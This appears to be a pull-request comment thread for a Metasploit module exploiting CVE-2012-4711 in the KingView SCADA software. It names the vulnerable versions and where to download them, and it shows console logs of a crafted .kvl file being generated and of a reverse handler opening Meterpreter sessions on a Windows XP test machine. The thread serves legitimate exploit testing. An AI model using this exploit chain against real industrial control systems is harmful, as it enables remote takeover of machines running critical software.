Added module for CVE-2012-4711

[jvazquez-r7]

• With kingview 6.52 English as downloaded from:

http://www.kingview.com/download/index.aspx (Registration required)

MD5 (kingview6.52_63.5MB.rar) = 1c069edc716d24d779bcb94a5f43d58c

Test:

msf  exploit(handler) > use exploit/windows/fileformat/kingview_kingmess_kvl 
msf  exploit(kingview_kingmess_kvl) > rexploit
[*] Reloading module...

[+] msf.kvl stored at /Users/juan/.msf4/local/msf.kvl
msf  exploit(kingview_kingmess_kvl) > use exploit/multi/handler 
msf  exploit(handler) > rexploit
[*] Reloading module...

[*] Started reverse handler on 192.168.1.128:4444 
[*] Starting the payload handler...
[*] Sending stage (752128 bytes) to 192.168.1.134
[*] Meterpreter session 1 opened (192.168.1.128:4444 -> 192.168.1.134:1042) at 2013-03-13 19:59:46 +0100

meterpreter > sysinfo
Computer        : JUAN-C0DE875735
OS              : Windows XP (Build 2600, Service Pack 3).
Architecture    : x86
System Language : en_US
Meterpreter     : x86/win32
meterpreter > exit
[*] Shutting down Meterpreter...

[*] 192.168.1.134 - Meterpreter session 1 closed.  Reason: User exit

[jvazquez-r7]

Definitely seems like the 6.53 free trial downloadable from:

http://www.wellintech.com/documents/KingView6.53_EN.zip

is also vulnerable, please check Kingmess.exe 65.20.2003.10300 is installed :)

Hope it helps with testing!

msf  exploit(handler) > rexploit
[*] Reloading module...

[*] Started reverse handler on 192.168.1.128:4444 
[*] Starting the payload handler...
[*] Sending stage (752128 bytes) to 192.168.1.134
[*] Meterpreter session 2 opened (192.168.1.128:4444 -> 192.168.1.134:1040) at 2013-03-13 20:36:15 +0100

meterpreter > sysinfo
Computer        : JUAN-C0DE875735
OS              : Windows XP (Build 2600, Service Pack 3).
Architecture    : x86
System Language : en_US
Meterpreter     : x86/win32
meterpreter >